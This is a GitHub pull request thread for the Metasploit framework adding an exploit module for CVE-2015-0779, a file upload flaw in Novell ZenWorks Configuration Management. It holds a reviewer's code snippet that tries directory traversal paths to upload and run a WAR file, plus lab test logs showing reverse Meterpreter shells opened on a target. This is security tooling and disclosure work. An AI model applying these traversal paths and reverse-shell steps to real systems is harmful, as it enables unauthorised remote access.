Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Create exploit for CVE-2015-0779 #5096

Merged
merged 3 commits into from May 1, 2015
Merged

Create exploit for CVE-2015-0779 #5096

merged 3 commits into from May 1, 2015

Conversation

pedrib
Copy link
Contributor

@pedrib pedrib commented Apr 7, 2015

This is an exploit for CVE-2015-0779, a file upload vulnerability in ZenWorks Configuration Management up to and including 11.3.1.
This exploit works in Windows, Linux and the Virtual Appliance which can be downloaded from Novell's website. It has been extensively tested on all platforms.

I'll add the full disclosure and OSVDB links once they become available, but otherwise it is ready to go on my side.

@pedrib pedrib changed the title CVE-2015-0779 Create exploit for CVE-2015-0779 Apr 7, 2015
@pedrib
Copy link
Contributor Author

pedrib commented Apr 9, 2015

Added OSVDB and full disc URL, good to go!

@pedrib
Copy link
Contributor Author

pedrib commented May 1, 2015

Bump? Do you need anything else, please let me know!

@jvazquez-r7 jvazquez-r7 self-assigned this May 1, 2015
end


def exploit
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I feel like it should be something like:

tomcat_paths = []
if datastore['TOMCAT_PATH'] 
  tomcat_paths << datastore['TOMCAT_PATH']
end
tomcat_paths.concat([ '../../../opt/novell/zenworks/share/tomcat/webapps/', '../webapps/' ])

tomcat_paths.each do |tomcat_path|
  upload_war_and_exec(tomcat_path)
  break if session_created?
end

@jvazquez-r7
Copy link
Contributor

Testing, if works I can make cleanup by myself, looks like minor things :)

@jvazquez-r7
Copy link
Contributor

Module works:

msf exploit(zcm_file_upload) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.132:443 - Uploading WAR file to ../../../opt/novell/zenworks/share/tomcat/webapps/
[-] 172.16.158.132:443 - Failed to upload, try again with a different path?
[*] 172.16.158.132:443 - Uploading WAR file to ../webapps/
[*] 172.16.158.132:443 - Upload appears to have been successful, waiting 15 seconds for deployment
[*] 172.16.158.132:443 - Executing payload, wait for session...
[*] Sending stage (30680 bytes) to 172.16.158.132
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.132:1119) at 2015-05-01 13:00:35 -0500

meterpreter > getuid
sServer username: __z_158_132__
ymeterpreter > syssinfo
[-] Unknown command: syssinfo.
meterpreter > sysinfo
Computer    : juan-6ed9db6ca8
OS          : Windows 2003 5.2 (x86)
Meterpreter : java/java
meterpreter >

I tested it against a ZCM 10.2 ISO I had in the archives. I'll do some final cleanup by myself and land in a while! Thanks!

@jvazquez-r7 jvazquez-r7 merged commit 4808d61 into rapid7:master May 1, 2015
@jvazquez-r7
Copy link
Contributor

Landed finally! Had some problems with my ZCM installation, had to reinstall!

Final commit: a531ad9

Final test:

msf exploit(zenworks_configuration_management_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.133:443 - Uploading WAR file to ../../../opt/novell/zenworks/share/tomcat/webapps/
[-] 172.16.158.133:443 - Failed to upload, try again with a different path?
[*] 172.16.158.133:443 - Uploading WAR file to ../webapps/
[*] 172.16.158.133:443 - Upload appears to have been successful
[*] 172.16.158.133:443 - Attempting to launch payload in deployed WAR...
[*] 172.16.158.133:443 - Attempting to launch payload in deployed WAR...
[*] 172.16.158.133:443 - Attempting to launch payload in deployed WAR...
[*] Sending stage (30680 bytes) to 172.16.158.133
[*] 172.16.158.133:443 - Attempting to launch payload in deployed WAR...

meterpreter > getuid
sServer username: __z_158_133__
meterpreter > sysinfo
Computer    : juan-6ed9db6ca8
OS          : Windows 2003 5.2 (x86)
Meterpreter : java/java
meterpreter > exit -y

Thanks @pedrib !

@pedrib pedrib deleted the CVE-2015-0779 branch February 1, 2017 00:39
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

3 participants